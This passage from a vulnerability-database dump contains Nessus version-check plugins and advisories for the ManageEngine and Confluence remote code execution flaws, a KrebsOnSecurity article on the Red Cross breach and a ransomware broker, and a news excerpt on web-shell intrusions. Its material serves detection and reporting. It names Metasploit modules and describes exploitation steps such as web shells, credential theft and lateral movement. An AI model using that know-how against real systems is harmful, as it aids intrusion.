Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. 
Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Cannot know if manual workaround is in place.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\n\ninstall_url = build_url(port:port, qs:dir);\n\nif (ismsp) appname += \" MSP\";\n\nif (build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\nelse\n rep_version += \" Build \" + build;\n\nbuild = int(build);\nif (version =~ \"^10(\\.|$)\" && build < 100479)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 10 Build 100479' +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-12T11:58:15", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.12.x < 7.12.5 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112964", "href": "https://www.tenable.com/plugins/was/112964", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-12T11:58:13", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112961", "href": "https://www.tenable.com/plugins/was/112961", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-12T11:58:09", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.11.6 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112963", "href": "https://www.tenable.com/plugins/was/112963", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-12T11:58:14", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. 
The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled.\n\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-01T00:00:00", "type": "nessus", "title": "Atlassian Confluence Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-08T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112944", "href": "https://www.tenable.com/plugins/was/112944", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-12T11:58:13", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 7.4.11 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112962", "href": "https://www.tenable.com/plugins/was/112962", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-20T14:14:26", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-08-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-67940.NASL", "href": "https://www.tenable.com/plugins/nessus/152864", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152864);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-26084\");\n script_xref(name:\"IAVA\", value:\"2021-A-0397\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an OGNL injection vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. 
It is, therefore, affected by an OGNL injection\nvulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute\narbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb62fdb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-67940\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.23, 7.4.11, 7.11.6, 7.12.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26084\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence WebWork OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nvar constraints = [\n {'fixed_version' : '6.13.23' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.11' },\n {'min_version' : '7.5', 'fixed_version' : '7.11.6' },\n {'min_version' : '7.12', 'fixed_version' : '7.12.5', 'fixed_display' : '7.12.5 / 7.13.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-20T14:17:55", "description": "The remote Atlassian Confluence application running on the remote host is affected by an OGNL injection vulnerability that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance by sending a specially crafted HTTP request.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-07T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Webwork OGNL Injection (CVE-2021-26084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2021_26084.NBIN", "href": "https://www.tenable.com/plugins/nessus/153087", "sourceData": 
"Binary data confluence_cve_2021_26084.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:30", "description": "An authentication bypass vulnerability exists in Zoho ManageEngine ADSelfService Plus. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-14T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine ADSelfService Plus Authentication Bypass (CVE-2021-40539)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-14T00:00:00", "id": "CPAI-2021-0879", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:23", "description": "A remote code execution vulnerability exists in Zoho ManageEngine Desktop Central. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-08T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Remote Code Execution (CVE-2020-10189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-08T00:00:00", "id": "CPAI-2020-0118", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:29:45", "description": "A remote code execution vulnerability exists in Atlassian Confluence. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2021-26084)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2021-0548", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2022-02-16T19:27:08", "description": "A network intrusion at the **International Committee for the Red Cross** (ICRC) in January led to the theft of personal information on more than 500,000 people receiving assistance from the group. KrebsOnSecurity has learned that the email address used by a cybercriminal actor who offered to sell the stolen ICRC data also was used to register multiple domain names the FBI says are tied to a sprawling media influence operation originating from Iran.\n\n\n\nOn Jan. 
19, the ICRC disclosed the compromise of servers hosting the personal information of more than 500,000 people receiving services from the [Red Cross and Red Crescent Movement](<https://en.wikipedia.org/wiki/International_Red_Cross_and_Red_Crescent_Movement>). The ICRC said the hacked servers contained data relating to the organization's **Restoring Family Links** services, which works to reconnect people separated by war, violence, migration and other causes.\n\nThe same day the ICRC went public with its breach, someone using the nickname "**Sheriff**" on the English-language cybercrime forum **RaidForums** advertised the sale of data from the Red Cross and Red Crescent Movement. Sheriff's sales thread suggests the ICRC was asked to pay a ransom to guarantee the data wouldn't be leaked or sold online.\n\n"Mr. Mardini, your words have been heard," Sheriff wrote, posting a link to the Twitter profile of **ICRC General Director Robert Mardini** and urging forum members to tell him to check his email. "Check your email and send a figure you can pay."\n\n\n\nRaidForums member "unindicted" aka Sheriff selling access to the International Red Cross and Red Crescent Movement data. Image: Ke-la.com\n\nIn their [online statement about the hack](<https://www.icrc.org/en/document/cyber-attack-icrc-what-we-know>) (updated on Feb. 7) the ICRC said it had not had any contact with the hackers, and no ransom demand had been made.\n\n"In line with our standing practice to engage with any actor who can facilitate or impede our humanitarian work, we are willing to communicate directly and confidentially with whoever may be responsible for this operation to impress upon them the need to respect our humanitarian action," the ICRC statement reads.\n\nAsked to comment on Sheriff's claims, the ICRC issued the following statement:\n\n"Right now, we do not have any conclusive evidence that this information from the data breach has been published or is being traded. 
Our cybersecurity team has looked into any reported allegation of data being available on the dark web."\n\n**Update, 2:00 p.m., ET:** The ICRC just published an update to its [FAQ on the breach](<https://www.icrc.org/en/document/cyber-attack-icrc-what-we-know>). The ICRC now says the hackers broke in on Nov. 9, 2021, using an unpatched critical vulnerability (CVE-2021-40539). "This vulnerability allows malicious cyber actors to place web shells and conduct post-exploitation activities such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. Once inside our network, the hackers were able to deploy offensive security tools which allowed them to disguise themselves as legitimate users or administrators. This in turn allowed them to access the data, despite this data being encrypted."\n\n_Original story:_\n\nThe email address that Sheriff used to register at RaidForums -- **kelvinmiddelkoop@hotmail.com** -- appears in [an affidavit for a search warrant filed by the FBI](<https://www.justice.gov/usao-ndca/press-release/file/1334571/download>) roughly a year ago. That FBI warrant came on the heels of [an investigation published by security firm **FireEye**](<https://www.mandiant.com/resources/report-suspected-iranian-influence-operation>), which examined an Iran-based network of inauthentic news sites and social media accounts aimed at the United States, U.K. and other western audiences.\n\n"This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests," FireEye researchers wrote. "These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. 
policies favorable to Iran."\n\n\n\nThe FBI says the domains registered by the email address tied to Sheriff's RaidForums account were used in service of the Liberty Front Press, a network of phony news sites thought to originate from Iran.\n\nAccording to the FBI affidavit, the address kelvinmiddelkoop@hotmail.com was used to register at least three different domains for phony news sites, including awdnews[.]com, sachtimes[.]com, and whatsupic[.]com. A reverse WHOIS search on that email address at [DomainTools.com](<https://www.domaintools.com>) (an advertiser on this site) shows it was used to register 17 domains between 2012 and 2021, including moslimyouthmedia[.]com, moslempress[.]com, and realneinovosti[.]net.\n\nA review of Sheriff's postings to RaidForum reveals he has used two other nicknames since registering on the forum in December 2021: "**Unindicted**," and "**threat_actor**." In several posts, Sheriff taunts one FireEye employee by name.\n\nIn a Jan. 3, 2022 post, Sheriff says their "team" is seeking licenses for the Cobalt Strike penetration testing tool, and that they're prepared to pay $3,000 - $4,000 per license. Cobalt Strike is a legitimate security product that is sold only to vetted partners, but compromised or ill-gotten Cobalt Strike licenses [frequently are used in the run-up to ransomware attacks](<https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks>).\n\n"We will buy constantly, make contact," Sheriff advised. "Do not ask if we still need)) the team is interested in licenses indefinitely."\n\nOn Jan. 4, 2022, Sheriff tells RaidForums that their team is in need of access to a specific data broker platform, and offers to pay as much as $35,000 for that access. 
Sheriff says they will only accept offers that are guaranteed through the forum's escrow account.\n\nThe demand for escrow in a sales thread is almost universally a sign that someone means business and they are ready to transact on whatever was advertised or requested. That's because escrow transactions necessarily force the buyer to make a deposit with the forum's administrators before proceeding on any transaction.\n\nSheriff appears to have been part of a group on RaidForums that [offered to buy access to organizations that could be extorted with ransomware or threatened with the publication of stolen data](<https://krebsonsecurity.com/wp-content/uploads/2022/02/kela-scrape.pdf>) (PDF screenshot from threat intelligence firm [KELA](<https://ke-la.com>)). In a "scam report" filed against Sheriff by another RaidForums member on Dec. 31, 2021, the claimant says Sheriff bought access from them and agreed to pay 70 percent of any ransom paid by the victim organization.\n\nInstead, the claimant maintains, Sheriff only paid them roughly 25 percent. "The company pay $1.35 million ransom and only payment was made of $350k to me, so i ask for $600k to fix this dispute," the affiliate wrote.\n\nIn another post on RaidForums, a user aptly named "FBI Agent" advised other denizens to steer clear of Sheriff's ransomware affiliate program, noting that transacting with this person could run afoul of sanctions from the U.S. 
Department of the Treasury's **Office of Foreign Assets Control** (OFAC) that restrict commerce with people residing in Iran.\n\n"To make it clear, we don't work with individuals under the OFAC sanctions list, which @Sheriff is under," the ransomware affiliate program administrator wrote in reply.\n\nRaidForums says Sheriff was referred to the forum by **Pompompurin**, the same hacker who used a security hole in the FBI's website last year [to blast a phony alert about a cybercrime investigation to state and local authorities](<https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/>). Pompompurin has been quite active on RaidForums for the past few years, frequently posting databases from newly hacked organizations, and [selling access to stolen information](<https://www.securityweek.com/fbi-hacker-offers-sell-data-allegedly-stolen-robinhood-breach>).\n\nReached via Twitter, Pompompurin said they had no idea who might have offered money and information on Sheriff, and that they would never "snitch" on Sheriff.\n\n"I know who he is but I'm not saying anything," Pompompurin replied.\n\nThe information about Sheriff was brought to my attention by an anonymous person who initially contacted KrebsOnSecurity saying they wanted to make a donation to the publication. When the person offering the gift asked if it was okay that the money came from a ransomware transaction, I naturally declined the offer.\n\nThat person then proceeded to share the information about the connection between Sheriff's email address and the FBI search warrant, as well as the account's credentials.\n\nThe same identity approached several other security researchers and journalists, one of whom was able to validate that the kelvinmiddelkoop@hotmail.com address actually belonged to Sheriff's account. 
Those researchers were likewise offered tainted donations, except the individual offering the donation seemed to use a different story with each person about who they were or why they were offering money. Others contacted by the same anonymous user said they also received unsolicited details about Sheriff.\n\nIt seems clear that whoever offered that money and information has their own agenda, which may also involve attempts to make members of the news media appear untrustworthy for agreeing to accept stolen funds. However, the information they shared checks out, and since there is precious little public reporting on the source of the ICRC intrusion, the potential connection to hacker groups based in Iran seems worth noting.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-16T16:44:19", "type": "krebs", "title": "Red Cross Hack Linked to Iranian Influence Operation?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2022-02-16T16:44:19", "id": "KREBS:69ADDAD13D83673CDE629B3AD655DD29", "href": 
"https://krebsonsecurity.com/2022/02/red-cross-hack-linked-to-iranian-influence-operation/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:07", "description": "At least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by leveraging a [recently patched critical vulnerability](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution.\n\nThe spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor.\n\n\"The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation,\" researchers from Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) in a report. 
